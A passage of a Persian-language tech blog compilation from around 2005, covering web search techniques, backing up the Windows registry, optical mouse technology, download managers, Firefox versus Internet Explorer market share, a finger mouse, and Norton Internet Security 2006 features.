11 – استفاده از كوتاهسازي كليد واژهها: اين تكنيك به ما امكان ميدهد كه با وارد كردن بخشي از يك كليد واژه بتوانيم مشتقات مختلف آن را نيز در فرآيند جستجو بازيابي كنيم. اكثر موتورهاي جستجو اين تكنيك را با استفاده از علامت ستاره (*) ارايه ميدهند. يكي از مشكلات استفاده از اين تكنيك اين است كه باعث بازيابي اطلاعات غيرمرتبط و ناخواسته زيادي ميشود.
12 – استفاده از عملگر نزديكيابي: در بسياري از موارد استفاده از عملگر AND باعث بازيابي اطلاعاتي ميشود كه براي ما مفيد نيست. به اين دليل كه اين عملگر كليد واژهها را در هر كجاي متن كه باشند بازيابي ميكند. در اين موارد استفاده از تكنيك نزديكيابي ميتواند از ريزش كاذب اطلاعات و يا بازيابي اطلاعات غيرمرتبط جلوگيري نمايد. همه موتورهاي جستجو قابليت استفاده از اين تكنيك را ندارند ولي به عنوان مثال در موتور جستجوي آلتاويستا ميتوان با استفاده از عملگر NEAR از اين تكنيك استفاده نمود.
13 – جستجوي تركيبي با استفاده از پرانتز: اين تكنيك يكي از مهمترين تكنيكهاي جستجو ميباشد كه به وسيله آن ميتوان تا حدود زيادي از بازيابي موارد غيرمرتبط در محيط وب جلوگيري كرد. در اين روش ميتوان از همه عملگرهاي جستجو كه در بالا گفته شده يكجا استفاده كرد و آنها را با همديگر تركيب نمود.
14 – جستجوي كليدواژه در عنوان صفحات وب: اين تكنيك با اين پيش فرض كه عنوان يك صفحه وب تا حدود زيادي نمايانگر محتواي اطلاعات موجود در آن است به جستجوي واژههاي كليدي در عنوان سايتها ميپردازد. علامت آن در موتورهاي جستجو متفاوت است ولي اغلب موتورهاي جستجو از طريق فهرست انتخابي و يا گزينههاي ديگر اين امكان را فراهم ميآورند.
15 – جستجوي حوزه سايتها: با توجه به اين كه به صورت قراردادي هر كشوري حوزه خاصي در محيط وب دارد، قابليت جستجوي حوزه سايتها به ما اين امكان را ميدهد كه فرايند جستجو را به حوزه خاصي نظير سايتهاي وب ايران (IR) و يا سايتهاي وب سازمانهاي غير انتفاعي (ORG) محدود كنيم. دستورات استفاده از اين تكنيك در موتورهاي جستجو مختلف ميباشد.
16 – محدود كردن جستجو به زبانهاي مختلف باعث ميشود نتايج جستجو به زبانهاي ديگر آورده نشود و انتخاب مطلب مورد نظر آسانتر است.
17 – محدود كردن جستجو به تاريخ انتشار منابع در وب: تاريخ انتشار يا به اصطلاح روزآمدي مطلب به خصوص در منابع علمي اصل مهمي است و اينگونه محدوديت باعث ميشود بنا به نياز كاربر جديدترين و يا قديميترين منبع بازيابي بشود.
18 – جستجوي رسانههاي مختلف؛ موسيقي، عكس، ويدئو: زماني كه فقط نوع خاصي از رسانه مورد نياز است به عنوان مثال زماني كه به عكس يك شخصيت نياز داريم، جستجو در ميان عكسها باعث ميشود نتيجه جستجو شامل اطلاعات ديگري در مورد آن شخصيت نباشد.
19 – جستجوي صفحات با فرمتهاي مختلف: PDF, WORD, MP3, MPEG, ….: زماني كه فرمت خاصي مورد نظر است ميتوان از اين تكنيك استفاده كرد . به عنوان مثال اگر مايل باشيم منبع بازيابي شده در فرمت PDF باشد، اين تكنيك ميتواند مفيد باشد.
20 – آگاهي از پيشفرضهاي جستجو در موتور جستجو: با توجه به اين كه هر موتور جستجو براي تركيب واژهها يك پيشفرض دارد و اگر از هيچ گونه عملگري استفاده نشود، كليد واژهها را به صورت پيشفرض با يكي از عملگرهاي جبر بولي تركيب ميكند؛ آگاهي از اين پيشفرض موتورهاي جستجوي مختلف مهارت ما را در جستجو بالا ميبرد.
21 – وب نامريي: وب نامرئي به دو دليل كمي و كيفي اهميت دارد كمي از اين نظر كه موتورهاي جستجو فقط قادر هستند حدود 16 درصد از اطلاعات موجود در اينترنت را بازيابي كنند و اندازه وب نامريي تقريبا 500 برابر وب مريي است و كيفي از اين نظر كه منابع اطلاعاتي موجود در وب عميق معمولا ارزشمند و مفيد هستند و در بسياري از موارد پاسخگوي نياز كاربران ميباشند. آشنايي با ابزارهايي كه براي شناسايي منابع وب نامريي به وجود آمدهاند و كاربران را به سايتهاي مناسب راهنمايي ميكنند، باعث دسترسي به اين بخش عظيم از اطلاعات مفيد و ارزشمند ميشود. مثل سايت INVISIBLEWEB كه فهرستي از منابع نامريي را و سايت COMPLETEPLASET كه فهرستي از تقريبا 40000 پايگاه اطلاعاتي وب نامريي را ارايه ميدهد.
منبع : ايسنا
یکی از بخش های جذاب ویندوز بخش رجیستری آن است ، کاربران ویندوز با تغییراتی که در آن می دهند می توانند قابلیت های کامپیوتر خود را به دلخواه خود در آورند بین معنی که بعضی از بخش های ویندوز را فعال یا غیر فعال کنند
اما همان قدر که این بخش می تواند جذاب باشد ، تغییرات اشتباه در آن نیز گاهی موجب از دست رفتن ویندوزتان خواهد شد ، به همین علت است که همیشه قبل از دستکاری رجیستری در ویندوز کاربران را به گرفتن بک آپ ( نسخه پشتیبان ) از رجیستری سفارش می کنند
اما گرفتن نسخه پشتیبان از رجیستری چگونه است ؟
برای این کار راه های مختلفی وجود دارد . در این جا دو روش برای گرفتن Backup از رجیستری را ذکر می کنیم
روش اول : از منوی start گزینه run را انتخاب کنید . در کادری که باز میشود regedit را تایپ کرده و Ok کنید. اکنون پنجره Regisery Editor برای شما باز خواهد شد . در بالای پنجره و از منوی File گزینه Export را انتخاب کنید ، اکنون می توانید نسخه پشیبان رجیستری در هر دایرکتوری دلخواهتان ذخیره کنید ، بدیهی است که در صورت تغییرات نامناسب در رجیستری می توانید از همای منوی فایل و انتخاب گزینه Import نشخه پشتیبان را فراخوانی کنید
روش دوم : به منوی start رفته و به ترتیب وارد منو های All programs ، Accessories ، System tools شده و Backup را انتخاب کنید ، اکنون می توانید به صورت دلخواه از هر قسمت از اطلاعات موجود در کامپیتوترتان نسخه Backup بگیرید
متاسفانه با پشتیبانی نکردن شرکتهای بزرگ نرم افزاری مثل یاهو از زبان فارسی ٬
زبانی موسوم به پینگلیشی در میان کاربران فارسی زبان مرسوم شده
که کاربران برای اطمینان از سالم بودن متنی که بدست مخاطب میرسه مجبور به استفاده از این زبان جدید هستن
اما در این میان برنامه نویسان کشورمان هم بیکار ننشسته و برنامه ای تحت عنوان en2fa طراحی کردن
این برنامه متنی رو که به زبان پینگلیشی تایپ می کنید ٬ به زبان فارسی تبدیل میکنه
ویژگیهای اصلی این برنامه:
امکان برقراری ارتباط با برنامه های دیگر از جمله یاهو مسنجر
گرفتن خروجی به قالبهای مختلف
وارد کردن متن از فایل متنی
اضافه کردن کلمات به بانک اطلاعاتی برنامه
رابط کاربری ساده و مفید

موس های نوری اولین بار در سال 1999 به وسیله شرکت Agilent Techs وارد بازار شدند . درباره فناوری ساخت آن ها به طور خلاصه چنین میتوان گفت که این موسها عملیات تعیین مکان را با گرفتن 1500 تصویر در ثانیه به وسیله چیزی شبیه یک دوربین کوچک انجام میدهند . این موس ها که روی سطوح خاص راحت تر از مدل های قبلی خود کار می کنند ، از یک دیود نوری همراه یک سیستم پردازش تصویر ساده بهره می برند . دیود نوری که که به طور مایل در کف موس نصب شده است نور را به سطح زیر موس می تاباند. نور پس از برخورد و بازتاب از سطح روی یک حسگر روی یک حسگر Cmos ( نیمه هادی اکسید فلز ) می افتد . این حسگربسته به شدت نور تابیده در هر نقطه ، تصویری لحظه ای از سطح زیر LED ( دیود نوری ) تولید میکند و آن را برای تحلیل به صورت سیگنال هایی به یک واحد پردازش سیگنال دیجیتال ( DSP ) می فرستد . ( این واحد به صورت یک مدار مجتمع در خود موس تعبیه شده است . واحد پردازش سیگنال که قابلیت اجرای 18 میلیون دستور العمل را در ثانیه دارد . می تواند الگویی هایی را در تصاویر دریافتی تشخیص دهد و تعداد جابجایی آن ها در تصاویر متوالی را دنبال کند.
به این ترتیب بر اساس تغییر الگو ها در یک مجموعه تصاویر متوالی ، DSP میزان حرکت موس در این فاصله را محاسبه می کند و و مختصات متناظر با مکان جدید آن را به رایانه به رایانه میفرستد . رایانه نیز نشانگر موس را بر اساس مختصات دریافت شده روی صفحه نمایشگر جابجا میکند . این اتفاق صد ها بار در ثانیه می افتد ، طوری کهخ حرکت نشانگر روی صفحه پیوسته به نظر می رسد . مهمترین پیشرفتی که امروزه در تولید موس های اپتیکی موس مشاهده میشود ، افزایش سرعت عکسبرداری این موس هاست تا جایی که این رقم به بیش از 6000 عکس در ثانیه رسیده است .
(Download Accelerator Plus (DAP 7.5
بعد از مرورگروب داشتن دانلود منجری خوب یکی از نیاز های ضروری هر کاربر اینترنت میباشد. Download Accelerator Plus یکی از قدیمی ترین وقدرتمندترین و بهترین نرم افزارهای مدیریت دانلود با دارا بودن میلیونها کاربر در سراسر دنیا میباشد. این نرم افزار که محصول شرکت نرم افزاری Speedbit میباشد در ورژن جدید خود تغیرات اساسی را به خصوص در اسکاین این برنامه وسرعت دانلود فایل ها به وجود آورده از جمله کارایی های دیگر این نرم افزار میتوان به قابلیت نگه داری اطلاعات دانلود شده و ادامه مجدد آنها در زمان دیگر, ساپورت کردن از FTp و HTTP و HTTPs و جالبترین قابلیت این نرم افزار که آنرا از دیگر نرم افزار های دانلود منجر پرطرفدار تر کرده قابلیت مرور فایل تا هر قسمت که دانلود شده میباشد این نرم افزار قادر است در زمان دانلود موسیقی ها و فیلم ها کیفیت و مدت زمان آن را نیز تعیین نمایید! همچنین در ورژن ریجسستر شده از این برنامه میتوان به عنوان یک نرم افزار برای آپلود اطلاعات استفاده نمود در حقییت این نرم افزار علاوه بر آنکه یک دانلود منجر خوبی است یک آپلود منجر خوب نیز میباشد.
بر اساس آمار منتشر شده توسط شرکت وب ساید استوری, در ماه های اخیر آمار رشد استفاده از مرورگر فایر فاکس در برابر اینترنت اکسپلورر به طرز چشم گیری كاهش یافته است.
شرکت وب ساید استوری یک موسسه پژوهشی درباره آمار و ارقام مربوط وب است که در شهر سن دیگو قرار دارد. بر اساس آخرین گزارش منتشر شده توسط این شرکت, سهم فایر فاکس در بازار مرورگر ها در پنج ماه اخیر تنها شاهد یک درصد رشد بوده است. بدین ترتیب که سهم 6.75 این مرورگر در ماه آوریل سال جاری به 7.86 در ماه سپتامبر رسیده است. یعنی تنها کمی بیش از یک درصد. این در حالیست که زمان انتشار این مرورگر در ماه نوامبر و طی زمانی کوتاهی بعد از آن در هر ماه سهم این مرورگر یک درصد رشد یافته بود. بنابراین کاملا آشکار است که با گذشت زمان تب استفاده از فایر فاکس فروکش کرده است و از افزایش ماهانه یک درصدی به افزایش پنج ماهه یک درصدی رسیده است.
ژئوف جانتسون یکی از آنالیست های شرکت وب ساید استوری در این باره می گوید : " به نظر می رسد رشد استفاده کاربران از فایر فاکس به نقظه حداکثر خود رسیده است و ما در آینده شاهد روند ثابتی خواهیم بود. ما همیشه می دانستیم میزان کاربرانی که از مایکروسافت متنفر هستند دارای رقم محدودی است و پس از طی شدن زمان مشخصی روند مهاجرت کاربران از اینترنت اکسپلورر به فایر فاکس متوقف خواهد شد. اکنون به نظر می رسد زمان پایان نسبی این مهاجرت فرا رسیده است. اکثریت کاربران فایر فاکس را کسانی تشکیل می دادند که پیش از اینترنت اكسپلور استفاده می کردند و بخاطر نارضایتی به سمت فایر فاکس کشیده شده بودند ".
سال گذشته و شروع امیدوار کننده فایر فاکس مدیران بنیاد موزیلا (شرکت تولید کننده فایرفاکس) پیش بینی می کردند با توجه به رشد کاربران این مرورگر در ماه های اولیه, میزان استفاده از فایر فاکس تا پایان سال 2005 به 10 درصد برسد. اما اکنون و در حالیکه تنها 3ه ماه به انتهای سال مانده است می توان گفت ادعای مدیران موزیلا هرگز به حقیقت نخواهد پیوست و احتمال آمار استفاده از این مرورگر تا پایان سال جاری حداکثر رقمی معادل 8.5 درصد کاربران خواهد بود. علاوه بر این انتشار قریب الوقوع اینترنت اکسپلورر 7 می تواند حتی روند رشد کند فایرفاکس را معکوس هم کند.
در مقابل کاهش رشد استفاده از اینترنت اکسپلورر نیز به طرز محسوسی کاهش یافته است. بطوری که از 88.86 درصد در ماه آوریل به 88.46 درصد در ماه سپتامبر رسیده است. این در حالیست که در پنج ماه اول انتشار فایرفاکس سهم اینترنت اکسپلورر شاهد کاهش پنج درصدی بود.
جانتسون در این باره می گوید : " مردم دیگر مثل سابق آن دید منفی را نسبت به اینترنت اکسپلورر ندارند. مرورگر های نا آشناتر نظیر اپرا و نت اسکیپ ممکن است در آینده نزدیک قربانی شوند و همین سهم اندک خود را نیز از دست بدهند و به عنوان مثال اپرا برای افزایش کاربرانش باید بتواند رضایت کاربرانی را که از فایرفاکس استفاده می کنند, جلب کند که این امری دشوار است. زیرا در بین کاربران اینترنت اکسپلورر کمتری کسی حاضر به تعویض مرورگر خود است. تجربه هم نشان داده است که کاربران معمولا علاقه ای چندانی به تعویض دوباره مرورگر خود ندارد.
هفته گذشته اپرا تغییراتی در لایسنس استفاده از مرورگر خود ایجاد کرد و نسخه بدون تبلیغ رایگان آنرا منتشر کرد. امری که جانتسون معتقد است اپرا با 18 ماه تاخیر انجام داده است و بازی را کاملا به فایرفاکس باخته است و دیگر هرگز نمی تواند به جایگاه فایرفاکس نزدیک بشود.
هم اینترنت اکسپلورر و هم فایرفاکس قصد دارند تا پایان سال جاری نسخه های آپدیت شده مرورگر های خود را منتشر کنند. نسخه بتای اینترنت اکسپلورر 7 که قرار است برای استفاده در سرویس پک 2 ویندوز اکس پی ارائه شود و همچنین نسخه های جدید تر Firefox 1.5 که هنوز نام آن اعلام نشده است. البته آقای جانتسون می گوید این نسخه تفاوت چندانی با ورژن های قبلی نخواهد داشت. حتی اینترنت اکسپلورر 7 نیز از ویژگی خاصی برخورد نخواهد بود و نمی تواند خطر بزرگی برای فایرفاکس باشد. این نسخه های جدید بیشتر جنبه سمبولیک دارند و برای ابراز وجود منتشر می شوند.

مدتی است که تلاش ها برای ارائه یک جایگزین برای موس ( موشواره ) های امروزی بالاگرفته است، از این رو به تازگی کمپانی ژاپنی greenhouse یک نمونه جذاب برای جایگزینی موس های متداول ارائه کرده است .
موس انگشتی ، این موس اپتیکی تنها 24.5 میلی متر پهنا و 85 میلی متر درازا داشته و در مرکز آن تنها یک دکمه تعبیه شده تا توسط آن بتوان عمل کلیک چپ را انجام داد . ونیز یک پیچک چرخنده در کناره آن قرار دارد که به توسط آن می توان در میان صفحات اسکرول کرد و نیز این قابلیت را دارد که عمل راست کلیک را نیز انجام دهد
مدیران این کمپانی اعلام کرده اند که احتمالا این موس را در سه رنگ سیاه ، سفید و نقره ای وبا قیمت زیر 25 دلار عرضه خواهند کرد
بیشتر در این مورد
به گزارش سايت اينترنتي PCWORLD، در نگارش جديد پايگاه ويژهاي به نام "نورتون پروتكشن سنتر" به اين مجموعه اضافه شده كه اطلاعات امنيتي گستردهاي را به صورت يكجا براي كاربر ارائه كرده و امكان فعال و يا غيرفعال كردن قابليتهاي امنيتي مختلف اين مجموعه را در اختيار كاربر قرار ميدهد.
مجموعه نرمافزاري "نورتون اينترنت سكيوريتي "۲۰۰۶شركت "سيمانتك" كه هماكنون يكي از بزرگترين توليدكنندگان نرمافزارهاي امنيتي در جهان محسوب ميشود، خود شامل نرمافزارهاي "نورتون آنتيويروس"، "نورتون پرسونال فايروال"، "نورتون آنتياسپم"، "پرايوسي كنترل" و "پرنتال كنترل" است و اين شركت قيمت نگارش جديد مجموعه فوق را ۷۰دلار اعلام كردهاست.
به علاوه شركت "سيمانتك" دو نرمافزار "نورتون آنتي ويروس" و "نورتون پرسونال فايروال" را به طور جداگانه نيز به فروش ميرساند.
ضد ويروس "نورتون" علاوه بر قابليتهاي فراوان شناسايي و نابود كردن ويروسهاي رايانهاي، به توانايي شناسايي و پاكسازي نرمافزارهاي مخرب و مزاحم "اسپايور" نيز مجهز شدهاست.
مجموعه "نورتون اينترنت سكيوريتي "۲۰۰۶داراي قابليت ديگري به نام "سكيوريتي اينسپكتور" است كه به شناسايي و ترميم حفرههاي امنيتي رايانه، از قبيل ايرادهاي امنيتي مرورگر اينترنتي ميپردازد و در صورت استفاده كاربر از كلمات عبور و اسمرمزهاي ساده و قابل شناسايي به ايمنسازي آنها اقدام ميكند.
اين مجموعه به ويژگي ضد هرزنامه جديدي نيز مجهز شده كه اين قبيل ايميلها را فيلتر كرده و از قرارگرفتن كاربر در معرض حملات "فيشينگ" جلوگيري ميكند.
